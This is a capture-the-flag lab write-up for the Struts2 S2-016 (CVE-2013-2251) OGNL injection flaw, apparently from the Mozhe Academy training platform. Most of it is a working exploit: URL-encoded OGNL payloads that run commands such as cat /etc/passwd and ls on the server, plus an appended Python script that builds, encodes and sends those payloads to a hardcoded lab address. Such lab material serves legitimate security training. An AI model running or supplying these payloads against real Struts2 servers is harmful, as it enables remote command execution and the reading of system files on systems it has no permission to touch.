Mozhe Academy (墨者學院) study notes: Struts2 S2-016 lab
By shy014
1. In Mozhe Academy, find this lab and click to start the target machine.
2. Locate the URL ending in .action: http://219.153.49.228:49162/index.action
3. Test whether the vulnerability exists with http://219.153.49.228:49162/index.action?redirect:${1+1} . This is S2-016 (CVE-2013-2251): the value after the redirect: parameter prefix is evaluated as an OGNL expression before the redirect is issued.
4. Because the browser would otherwise mangle the special characters, send the URL-encoded form http://219.153.49.228:49162/index.action?redirect:%24%7B1%2b1%7D . The redirect target reflects the evaluated result (2) rather than the literal text ${1+1}, which confirms that redirect: evaluates expressions and the vulnerability is present.
5. Use the arbitrary-command-execution EXP below. It must be URL-encoded before use: in particular every # becomes %23 and every = becomes %3d, since an unencoded # would be treated by the client as a URL fragment and never reach the server. The expression starts the command with ProcessBuilder, reads up to 50000 characters of its stdout, and writes them into the HTTP response via the HttpServletResponse object taken from the OGNL #context:
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
6. Run the ls command the same way to list the files in the application's working directory:
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'ls'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
7. The response is returned as a file download; open it and the listing shows a key.txt file.
8. Read the contents of key.txt with the same payload, again URL-encoded (the only change is the argument vector, which now runs cat key.txt instead of cat /etc/passwd):
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','key.txt'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
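The manual steps 3 to 8 above amount to one procedure: build the OGNL expression for a command, percent-encode it behind the redirect: prefix, and send it. The script below is an added example written for these notes, not code from the original write-up or from Mozhe Academy. It assumes the lab URL quoted above (lab hosts and ports are assigned per session, so it will need changing), and it builds the same payload the write-up uses, so the encoding can be checked offline without touching the target.

```python
#!/usr/bin/env python3
"""Added example: build, URL-encode and send the S2-016 ``redirect:`` OGNL
payload from the write-up. Assumed target: the lab URL quoted in the notes."""
import urllib.error
import urllib.parse
import urllib.request

# Assumption: the lab URL from the write-up; it changes per lab session.
BASE_URL = "http://219.153.49.228:49162/index.action"


def build_ognl(argv):
    """Return the raw OGNL expression that runs ``argv`` via ProcessBuilder and
    writes the first 50000 chars of its stdout into the HTTP response.

    ``argv`` is passed as a Java String[] (no shell is involved), so each
    element becomes a single-quoted OGNL string literal with quotes and
    backslashes escaped.
    """
    literals = ",".join(
        "'" + a.replace("\\", "\\\\").replace("'", "\\'") + "'" for a in argv
    )
    return (
        "${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"
        + literals
        + "})).start(),"
        "#b=#a.getInputStream(),"
        "#c=new java.io.InputStreamReader(#b),"
        "#d=new java.io.BufferedReader(#c),"
        "#e=new char[50000],"
        "#d.read(#e),"
        "#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),"
        "#matt.getWriter().println(#e),"
        "#matt.getWriter().flush(),"
        "#matt.getWriter().close()}"
    )


def encode_query(expression):
    """Percent-encode an OGNL expression and prefix it with ``redirect:``.

    safe="" forces '#', '=', '+', '{', '}', '(', ')', quotes and spaces to be
    encoded; an unencoded '#' would be treated as a URL fragment by the client
    and never reach the server.
    """
    return "redirect:" + urllib.parse.quote(expression, safe="")


def probe_query():
    """Steps 3/4: the harmless arithmetic probe, encoded as in the write-up."""
    return encode_query("${1+1}")


def command_query(argv):
    """Steps 5-8: the encoded command-execution payload for ``argv``."""
    return encode_query(build_ognl(argv))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses as HTTPError instead of silently following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url=BASE_URL, timeout=10):
    """Return the Location header of the probe response, or None.

    A vulnerable S2-016 target evaluates ${1+1} and redirects to '2'; a fixed
    one keeps the literal text or does not redirect at all.
    """
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(base_url + "?" + probe_query(), timeout=timeout) as resp:
            return resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.headers.get("Location")


def run_command(argv, base_url=BASE_URL, timeout=10):
    """Send the command payload and return the response body (command stdout)."""
    url = base_url + "?" + command_query(argv)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    print("probe Location ->", probe())
    print(run_command(["ls"]))
    print(run_command(["cat", "key.txt"]))
```

urllib.parse.quote emits uppercase hex (%3D rather than the write-up's %3d); the server decodes both identically. Decoding the query with urllib.parse.unquote gives back exactly the expression build_ognl produced, which is a quick way to check a hand-encoded payload before sending it.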
II. Using a Struts2 vulnerability scanning tool
1. Scan the target with the tool; it reports the vulnerability.
2. Execute the ls command through the tool.
3. Read the value in key.txt.
4. Submit the key.